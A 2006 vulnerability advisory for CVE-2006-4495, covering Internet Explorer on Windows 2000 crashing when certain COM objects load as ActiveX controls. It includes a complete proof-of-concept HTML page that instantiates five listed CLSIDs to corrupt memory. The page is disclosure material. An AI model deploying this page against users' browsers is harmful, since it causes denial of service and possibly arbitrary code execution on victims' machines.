Windows 2000 Multiple COM Object Instantiation Vulnerability

2006.09.01
Credit: nop (nop xsec org)
Risk: Medium
Local: No
Remote: Yes
CVE: CVE-2006-4495
CWE: CWE-Other


CVSS Base Score: 7.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

Advisory ID: XSec-06-08 Advisory Name: Windows 2000 Multiple COM Object Instantiation Vulnerability Release Date: 08/21/2006 Tested on: Windows 2000/Internet Explorer 6.0 SP1 Affected version: Windows 2000 Author: nop <nop#xsec.org> http://www.xsec.org Overview: Multiple vulnerability has been found in Windows 2000, When Internet Explorer tries to instantiate the ciodm.dll, MyInfo.dll,msdxm.ocx,Creator.dll(Media player 9) COM object as an ActiveX control, it may corrupt system memory in such a way that an attacker may DoS and possibly could execute arbitrary code. Exploit: =============== 2000obj.htm start ================ <!-- // Windows 2000 Multiple COM Object Instantiation Vulnerability // tested on Windows 2000 SP4 CN // http://www.xsec.org // nop (nop#xsec.org) --!> <html> <head> <title>COM-tester</title> </head> </body> <script> var i =0; var clsid = new Array( // NO: 1 // CLSID: {3BC4F3A3-652A-11D1-B4D4-00C04FC2DB8D} // Info: Microsoft Index Server Catalog Administration Object // ProgID: Microsoft.ISCatAdm.1 // InprocServer32: C:WINNTsystem32ciodm.dll "{3BC4F3A3-652A-11D1-B4D4-00C04FC2DB8D}", // NO: 2 // CLSID: {4682C82A-B2FF-11D0-95A8-00A0C92B77A9} // Info: MyInfo ASP Component// ProgID: MSWC.MyInfo.1 // InprocServer32: C:WINNTsystem32inetsrvMyInfo.dll "{4682C82A-B2FF-11D0-95A8-00A0C92B77A9}", // NO: 3 // CLSID: {8E71888A-423F-11D2-876E-00A0C9082467} // Info: RadioServer Class // ProgID: Mmedia.RadioServer.1 // InprocServer32: C:WINNTsystem32msdxm.ocx "{8E71888A-423F-11D2-876E-00A0C9082467}", // NO: 4 media player? // CLSID: {606EF130-9852-11D3-97C6-0060084856D4} // Info: CdCreator Class// ProgID: Creator.CdCreator.1 // InprocServer32: C:Program FilesCommon FilesAdaptec SharedCreatorAPIcreator.dll "{606EF130-9852-11D3-97C6-0060084856D4}", // NO: 5 media player? // CLSID: {F849164D-9863-11D3-97C6-0060084856D4} // Info: CdDevice Class// ProgID: Creator.CdDevice.1 // InprocServer32: C:Program FilesCommon FilesAdaptec SharedCreatorAPIcreator.dll "{F849164D-9863-11D3-97C6-0060084856D4}", // END null ); while(clsid[i]) { var a = document.createElement("object"); window.status = "Testing Object " + clsid[i] + "..."; a.setAttribute("classid", "clsid:" + clsid[i]); i++; } window.status = "failed!"; </script> </body> </html> =============== 2000obj.htm end ================== Link: http://www.xsec.org/index.php?module=Releases&act=view&type=1&id=16 About XSec: We are redhat.


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top